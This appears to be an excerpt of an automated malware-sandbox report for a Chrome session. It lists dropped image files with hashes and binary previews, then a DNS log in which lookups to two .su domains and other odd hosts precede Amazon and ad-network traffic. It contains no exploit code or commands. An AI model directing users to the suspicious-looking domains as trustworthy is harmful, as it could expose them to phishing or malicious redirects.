                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5698
                                                                                                                                                                                                        Entropy (8bit):7.805913534141137
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TOIV1/EggtcYdqBZ/pRqfRC94MQJkpQrTMT33buafEZGlODLsDJtcF:KYgtcYdi/afRC94MNAgT33buafu3GJKF
                                                                                                                                                                                                        MD5:9A18DC286FB02D0BC6D06D0F6A755685
                                                                                                                                                                                                        SHA1:DC1891581B13BB9F345274D8450C37D2CBEA840B
                                                                                                                                                                                                        SHA-256:215C00190445A8F06F7C269B20FF829A8F36AE02DEC49AE7048B2C56A0F7932C
                                                                                                                                                                                                        SHA-512:E09ACDD3ABE8A45BE0DC8AE4552DC594AF4945735403EFB074145E5FB1DB7908458244C3C57EC7BF3AAC683A3CEAEE5E432B57EA8BF1DFDF4808BF6B899EF6D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`......:.]...(......E.EZ...i..%.~Ov+*...........XCOF...g....C...n.q..q.a....|}:.WG..U..`.........9...Tb[?P...:5F...:.d[.Ke..=T[.Q..w...............b.....7.=....\.{..sH.z.G_.....Yz{...'..?.V.IY.h..QXr.3..............-j...Iz.]U.5'1.0..1...}.o1...j..-..Bs.7........:......H...z...$.G.................-j<..wLH.............5..Dh.......g.k.n\y..............Y..gy.Zk.-WQ..P.h/x@...>c.z.'..1%.w.]K>.~p^.g.V..r.*.1>o>.<...S..O.m.X.1...........KE...4.o.D....ZK.yv.~..H.."DzHQ.xH~.>]ww...RO..j.........1.}Eh...............-............................!1.. "0@#2ABP3Q............8.A.SkT..)+..ro.Y...g...?%......R..\T_.r"n.NkH..E.5.7".H..x..].E......z*`w+...T.+....2..O.zID..3..Cc(...7...$...u.....5.m.........4}...y...Y..:.]...'O.iru0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11599
                                                                                                                                                                                                        Entropy (8bit):7.967413309473415
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Sr4vUhG+D4wLi1I+RDk5D/AFukEYllZP4p3Nb7GOZZHSh3a9vL4QdozM1xEJWbW/:25hGS4wRMUzCgtGOzyh3auDzM1xEiW/
                                                                                                                                                                                                        MD5:49090B94803AB6E687F8362F34140240
                                                                                                                                                                                                        SHA1:E99F86063737614375AFAB52F07540EC2E209E0B
                                                                                                                                                                                                        SHA-256:D1EF0B8D4DFC54202DC385FDD3DD6D64408A2F894AFC44928BBD50B8FD41E48E
                                                                                                                                                                                                        SHA-512:B29FED27AC1483C0030D66441E0DEBB29DD5E2F172A321EE72BC54526D90DD2683ACB867B7496EA8BB8B0F4C74116C60C61D5D5E9D7340EC502B6287BD0090C1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!.1."A.#Q.2B...3Uaqr......6RTu......$Sb..%Dcs&Cd....................................................!1..."2AQaq....#4......3Bb.............?.....L.fUY.G9....x.<..._..<a.YY.)().Y.*...IM[.=.~.}..|~u.Q>{..:.9..5._.y...4rp...-.Fo.)*....8(.l.....J|.]...p1.#8.../....>.A q'.z.\5z.l.l.+*.$N......8]...p1.3......U.*a.g^K."H.o.......t..a\..%..?.J....k.......t.O...g..=......5....e..\E.si..].Mg..G.:..UQ..T....-.L.N.....$).._..;.'U.L....y..u.k=\..=Z57......5.N........[...N.Y..Gd.b.....eh.G..Z<..5.G.f.T.T"...7.)._......G.K.............c....L.O6...djvk...WV....F .LX.R..L*.!a%.....W..Cf..9..p.W.KD.x3W9..s.D.N]...UV...J......3E.jXC.w...........W...=...."&F.1.%.."..$h.....07.x.4..L.G.(x..bz....!.H.C.....!m.....F...T+..Ub.YX..lxo.....<...x.-kR.FeOq5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7588
                                                                                                                                                                                                        Entropy (8bit):7.6909282929960066
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:arP1ufExGkOvjozhURdObFVFJ0mvFKyujLZT8:arkgG5j6hUR4xVjdKysJ8
                                                                                                                                                                                                        MD5:2C7F6539F5409E3EC306AEAE72269142
                                                                                                                                                                                                        SHA1:FEA846A97E4A8551AF36055A9284F821B8E47DEF
                                                                                                                                                                                                        SHA-256:CC2AE74F93AB5C5A6FAD9A3F8056D84CCFB185BD2994B3B234FAC8B6C84B72C8
                                                                                                                                                                                                        SHA-512:28BF065B1E1AD76391ADCE3A1C4CFBCC98DD545231434CDB7479ACB7EE808DBA91D113BB92744F3AD3A5BF1F0C3A873F0D94EDCFE54A532E7E1C1E7F5C583EC8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31Id2i6D-rL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................,..................................................................................................................................................................C..H....g*buU..W*.U\..Ur.uU..W*.U\..Ur.uU..W*.U\..Vr.uY..Ur.'U............... .^6c..Z..H....:.)..`.m....0.2....i~.....DR>z...F...h.hi7....Oy[LiI7E..7&.1...te.%.tM_..i>...../..E7...........O..%...t...}.<.+....gVP...l.:[pz.>s-.|.yam....,...U$e....mJy.c],u...\..Jb.*..T.....8.9._U.Fm .........._.8.>...>....Z.g..c....[.aeK!I7.._f}?...n....._9I.U+(......{o.<.uh.{_-~+J..-.+oi:%..'QkB.Ij..s...7.>.f.........k.~t...[be........2.Z.5d.....$.E..B..c..O..^.CB../.i......T1.M>u..A6.z.Z}3i.'.6.^...r.Gam.E.<..h..s.._?.^.g.........k?.:...l.7r...._.G...o}.2x.{K.%...GS.}^{...R.
                                                                                                                                                                                                        No static file info
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Aug 15, 2024 15:37:45.457840919 CEST192.168.2.41.1.1.10x2131Standard query (0)aeromexico.playable.videoA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:45.458034039 CEST192.168.2.41.1.1.10x8663Standard query (0)aeromexico.playable.video65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:46.646024942 CEST192.168.2.41.1.1.10x15eeStandard query (0)foxloc.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:46.646245956 CEST192.168.2.41.1.1.10xb0e5Standard query (0)foxloc.com.br65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:47.367235899 CEST192.168.2.41.1.1.10x9d2fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:47.367361069 CEST192.168.2.41.1.1.10x2f2cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:51.357866049 CEST192.168.2.41.1.1.10xa2afStandard query (0)eff.contempi.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:51.358695030 CEST192.168.2.41.1.1.10xc90fStandard query (0)eff.contempi.su65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:52.761845112 CEST192.168.2.41.1.1.10xdc52Standard query (0)foxloc.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:52.762191057 CEST192.168.2.41.1.1.10x38caStandard query (0)foxloc.com.br65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.528927088 CEST192.168.2.41.1.1.10x14cdStandard query (0)ygbz.prosolmi.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.529103041 CEST192.168.2.41.1.1.10xa77Standard query (0)ygbz.prosolmi.su65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.656989098 CEST192.168.2.41.1.1.10xc351Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:53.657336950 CEST192.168.2.41.1.1.10x2679Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.516784906 CEST192.168.2.41.1.1.10x63fdStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.516904116 CEST192.168.2.41.1.1.10x1b37Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.525278091 CEST192.168.2.41.1.1.10x15b8Standard query (0)ygbz.prosolmi.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:55.525577068 CEST192.168.2.41.1.1.10xec50Standard query (0)ygbz.prosolmi.su65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.709798098 CEST192.168.2.41.1.1.10xdc4cStandard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.709799051 CEST192.168.2.41.1.1.10x4d6aStandard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.710493088 CEST192.168.2.41.1.1.10xaa0fStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.710493088 CEST192.168.2.41.1.1.10xae9Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.712023973 CEST192.168.2.41.1.1.10x215bStandard query (0)completion.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:56.712023973 CEST192.168.2.41.1.1.10x5815Standard query (0)completion.amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.843291044 CEST192.168.2.41.1.1.10xf8dbStandard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:57.843427896 CEST192.168.2.41.1.1.10xda14Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.025944948 CEST192.168.2.41.1.1.10xa05fStandard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.026096106 CEST192.168.2.41.1.1.10x604dStandard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.542325020 CEST192.168.2.41.1.1.10x7c31Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:58.542535067 CEST192.168.2.41.1.1.10xc2f0Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:59.467571974 CEST192.168.2.41.1.1.10xee07Standard query (0)unagi-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:37:59.467899084 CEST192.168.2.41.1.1.10xa1d4Standard query (0)unagi-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.811180115 CEST192.168.2.41.1.1.10xb6abStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:00.811486959 CEST192.168.2.41.1.1.10xf571Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:01.619561911 CEST192.168.2.41.1.1.10xc72cStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:01.619782925 CEST192.168.2.41.1.1.10xac8Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:01.622380018 CEST192.168.2.41.1.1.10xa985Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:01.622587919 CEST192.168.2.41.1.1.10x3fffStandard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.092819929 CEST192.168.2.41.1.1.10x1dc5Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:02.093024969 CEST192.168.2.41.1.1.10xbb24Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:14.394896030 CEST192.168.2.41.1.1.10x9fccStandard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:14.395037889 CEST192.168.2.41.1.1.10xa150Standard query (0)unagi.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.430980921 CEST192.168.2.41.1.1.10x8cf7Standard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.431262970 CEST192.168.2.41.1.1.10xfa56Standard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.560868025 CEST192.168.2.41.1.1.10x3d9aStandard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:15.561024904 CEST192.168.2.41.1.1.10x618bStandard query (0)unagi.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.310759068 CEST192.168.2.41.1.1.10x3772Standard query (0)completion.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.311120033 CEST192.168.2.41.1.1.10x64beStandard query (0)completion.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.323549032 CEST192.168.2.41.1.1.10xe0c8Standard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:18.323959112 CEST192.168.2.41.1.1.10x2e1bStandard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.587100983 CEST192.168.2.41.1.1.10xec2bStandard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:22.587219000 CEST192.168.2.41.1.1.10xb6caStandard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.406410933 CEST192.168.2.41.1.1.10x5009Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:23.406619072 CEST192.168.2.41.1.1.10xdb6dStandard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:27.648534060 CEST192.168.2.41.1.1.10xe035Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:27.652837992 CEST192.168.2.41.1.1.10xfed0Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.622530937 CEST192.168.2.41.1.1.10x3624Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.662751913 CEST192.168.2.41.1.1.10x6527Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.668159008 CEST192.168.2.41.1.1.10x16c0Standard query (0)match.360yield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:32.668519020 CEST192.168.2.41.1.1.10xc31Standard query (0)match.360yield.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.686810017 CEST192.168.2.41.1.1.10x6ec4Standard query (0)audex.userreport.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.687097073 CEST192.168.2.41.1.1.10x10f7Standard query (0)audex.userreport.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.688555956 CEST192.168.2.41.1.1.10x972fStandard query (0)rd.frontend.weborama.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.689007044 CEST192.168.2.41.1.1.10xfd74Standard query (0)rd.frontend.weborama.fr65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.690701962 CEST192.168.2.41.1.1.10x4d31Standard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.691762924 CEST192.168.2.41.1.1.10x7f99Standard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.692198992 CEST192.168.2.41.1.1.10x13b5Standard query (0)c1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.693732977 CEST192.168.2.41.1.1.10xd8a2Standard query (0)c1.adform.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.695727110 CEST192.168.2.41.1.1.10xce32Standard query (0)bs.serving-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.699935913 CEST192.168.2.41.1.1.10xbef7Standard query (0)bs.serving-sys.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.702460051 CEST192.168.2.41.1.1.10x1632Standard query (0)cookie-matching.mediarithmics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.703350067 CEST192.168.2.41.1.1.10x87efStandard query (0)cookie-matching.mediarithmics.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.705363035 CEST192.168.2.41.1.1.10xf658Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.705929041 CEST192.168.2.41.1.1.10x4ff1Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.711374998 CEST192.168.2.41.1.1.10xbc3fStandard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:33.711738110 CEST192.168.2.41.1.1.10x384aStandard query (0)tags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.878947020 CEST192.168.2.41.1.1.10xcc55Standard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.879254103 CEST192.168.2.41.1.1.10x5f4dStandard query (0)rtb-csync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.880307913 CEST192.168.2.41.1.1.10x212eStandard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.880839109 CEST192.168.2.41.1.1.10xd04eStandard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.882936954 CEST192.168.2.41.1.1.10x1e0dStandard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.883694887 CEST192.168.2.41.1.1.10xbc6Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.063054085 CEST192.168.2.41.1.1.10xbd72Standard query (0)lm.serving-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.063360929 CEST192.168.2.41.1.1.10x6764Standard query (0)lm.serving-sys.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.096043110 CEST192.168.2.41.1.1.10xeb19Standard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.096324921 CEST192.168.2.41.1.1.10xb7faStandard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.469019890 CEST192.168.2.41.1.1.10x2613Standard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.469304085 CEST192.168.2.41.1.1.10x5f3eStandard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.469702005 CEST192.168.2.41.1.1.10xaaa8Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.469832897 CEST192.168.2.41.1.1.10x3d09Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.470377922 CEST192.168.2.41.1.1.10x6405Standard query (0)public-prod-dspcookiematching.dmxleo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.471100092 CEST192.168.2.41.1.1.10x4f1cStandard query (0)public-prod-dspcookiematching.dmxleo.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.481882095 CEST192.168.2.41.1.1.10x2267Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.490986109 CEST192.168.2.41.1.1.10x2f3aStandard query (0)ads.stickyadstv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.491099119 CEST192.168.2.41.1.1.10x8d16Standard query (0)ads.stickyadstv.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.687815905 CEST192.168.2.41.1.1.10x795fStandard query (0)sync.rfp.fout.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.687948942 CEST192.168.2.41.1.1.10xcbe8Standard query (0)sync.rfp.fout.jp65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.168062925 CEST192.168.2.41.1.1.10xdc7aStandard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.170098066 CEST192.168.2.41.1.1.10x38bcStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.171427011 CEST192.168.2.41.1.1.10x796Standard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.171926022 CEST192.168.2.41.1.1.10xfe52Standard query (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.173016071 CEST192.168.2.41.1.1.10xe573Standard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.173372030 CEST192.168.2.41.1.1.10x1353Standard query (0)uipglob.semasio.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.173971891 CEST192.168.2.41.1.1.10x9ab6Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.174101114 CEST192.168.2.41.1.1.10x3f20Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.177469969 CEST192.168.2.41.1.1.10x8186Standard query (0)beacon.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.177625895 CEST192.168.2.41.1.1.10xcc30Standard query (0)beacon.krxd.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.216470957 CEST192.168.2.41.1.1.10xfcdfStandard query (0)beacon.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.229912043 CEST192.168.2.41.1.1.10x3f9bStandard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.230063915 CEST192.168.2.41.1.1.10xeb42Standard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.402837038 CEST192.168.2.41.1.1.10xb386Standard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.403142929 CEST192.168.2.41.1.1.10x247aStandard query (0)match.sharethrough.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.465904951 CEST192.168.2.41.1.1.10x2af5Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.466270924 CEST192.168.2.41.1.1.10x78d3Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.485276937 CEST192.168.2.41.1.1.10xee55Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.485519886 CEST192.168.2.41.1.1.10x877Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.498770952 CEST192.168.2.41.1.1.10x2177Standard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.498903990 CEST192.168.2.41.1.1.10x3befStandard query (0)rtb-csync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.502604961 CEST192.168.2.41.1.1.10x5f20Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.502661943 CEST192.168.2.41.1.1.10x6bb7Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.622945070 CEST192.168.2.41.1.1.10xffd9Standard query (0)loadus.exelator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.623078108 CEST192.168.2.41.1.1.10x49eStandard query (0)loadus.exelator.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.971889019 CEST192.168.2.41.1.1.10x6438Standard query (0)public-prod-dspcookiematching.dmxleo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.972043037 CEST192.168.2.41.1.1.10x506fStandard query (0)public-prod-dspcookiematching.dmxleo.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.077413082 CEST192.168.2.41.1.1.10x416Standard query (0)sync.rfp.fout.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.077699900 CEST192.168.2.41.1.1.10x779dStandard query (0)sync.rfp.fout.jp65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.110995054 CEST192.168.2.41.1.1.10xe50Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.111243963 CEST192.168.2.41.1.1.10x8ae9Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.113178968 CEST192.168.2.41.1.1.10x5c16Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.113390923 CEST192.168.2.41.1.1.10x9ae1Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.240027905 CEST192.168.2.41.1.1.10x4655Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.240391016 CEST192.168.2.41.1.1.10xd41fStandard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.583486080 CEST192.168.2.41.1.1.10xe276Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.583611012 CEST192.168.2.41.1.1.10xbc74Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.705569029 CEST192.168.2.41.1.1.10x2b62Standard query (0)sync.sxp.smartclip.netA (IP address)IN (0x0001)false
